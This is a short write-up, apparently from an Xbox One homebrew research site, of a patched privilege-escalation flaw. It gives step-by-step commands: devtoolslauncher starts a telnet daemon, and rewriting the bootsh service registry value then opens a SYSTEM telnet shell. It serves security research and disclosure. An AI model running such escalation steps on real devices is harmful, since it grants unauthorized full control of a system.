Skip to content

SystemOS Elevation of privileges via VSProfiling account


Release date N/A
Author Xbox One Research
Classification Elevation of privileges
Patched yes
Patch date N/A
First patched system version N/A
Source N/A
Download N/A


Previously dev mode let us use the devtoolslauncher program to start a "slightly elevated" process. After this registry could be modified. This way it was possible to rewrite process execution path of the bootsh service to start a full-privileged process.

This writeup explains how to start a "slightly privileged" on port 24 and a full-privileged telnet daemon on port 23.


  • Dev Mode
  • Shell access


  1. SSH to your console as DevToolsUser and VS Pairing Pin as password.
  2. Execute the following command to start a telnet-daemon on port 24 as User "VSProfilingAccount".
devtoolslauncher LaunchForProfiling telnetd "cmd.exe 24"
  1. Start a telnet connection to Port 24
  2. Execute the following commands on this telnet connection, this will start a telnet daemon on port 23 as local administrator:
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "telnetd.exe cmd.exe 23" /f
sc start bootsh
  1. Wait 10 seconds to make sure bootsh service started completely
  2. Now reset the registry-value to it's standard value by executing the following
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Bootsh\Parameters\Commands /v Xrun /t REG_SZ /d "xrun.exe SystemBootTasks" /f
  1. Start a new telnet connection to Port 23 - That's our awaited SYSTEM-shell
Authors: tuxuser